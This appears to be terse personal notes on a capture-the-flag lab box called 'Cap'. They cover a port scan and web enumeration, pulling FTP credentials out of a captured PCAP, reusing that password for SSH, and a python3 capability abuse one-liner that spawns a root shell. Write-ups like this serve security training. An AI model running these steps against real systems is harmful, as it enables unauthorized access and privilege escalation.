Cap

- 2 mins read

Recon

NMAP

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

searchspoit

  • vsftpd 3.0.3 - Remote Denial of Service

Walking the Web App

Port 80

  • We get a dashboard
    • Logged in by default as user Nathan
      • Cookies?
        • Nope
    • We see security snapshots page
      • PCAP analysis
      • Hint here perhaps the name of the box
        • Don’t see anything useful here
    • Ipconfig output page
    • Network status page
      • We see connections
  • These pages are not accessible to dirsearch but we are automatically logged in
[23:11:25] 302 -  208B  - /data  ->  http://10.10.10.245/                   
[23:11:25] 302 -  208B  - /data/adminer.php  ->  http://10.10.10.245/       
[23:11:25] 302 -  208B  - /data/autosuggest  ->  http://10.10.10.245/       
[23:11:26] 302 -  208B  - /download/users.csv  ->  http://10.10.10.245/     
[23:11:26] 302 -  208B  - /download/history.csv  ->  http://10.10.10.245/

WireShark

  • Downloading 0.pcap
  • We see a FTP connection and the username and password are shown
    • USER nathan
    • PASS Buck3tH4TF0RM3!
  • logging in, we see user.txt and linpeas is on the system
  • SSH password is the same password

PE

LinPeas

LinPeas shows 95% PE chance on: CVE-2021-3560

  • Upload the polkit PE PoC
    • gnome-control-center is not installed so the exploit will not work /usr/bin/python3.8 = cap_setuid, cap_net_bind_service+eip
  • Get root shell with $ /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  • root.txt is found in /root/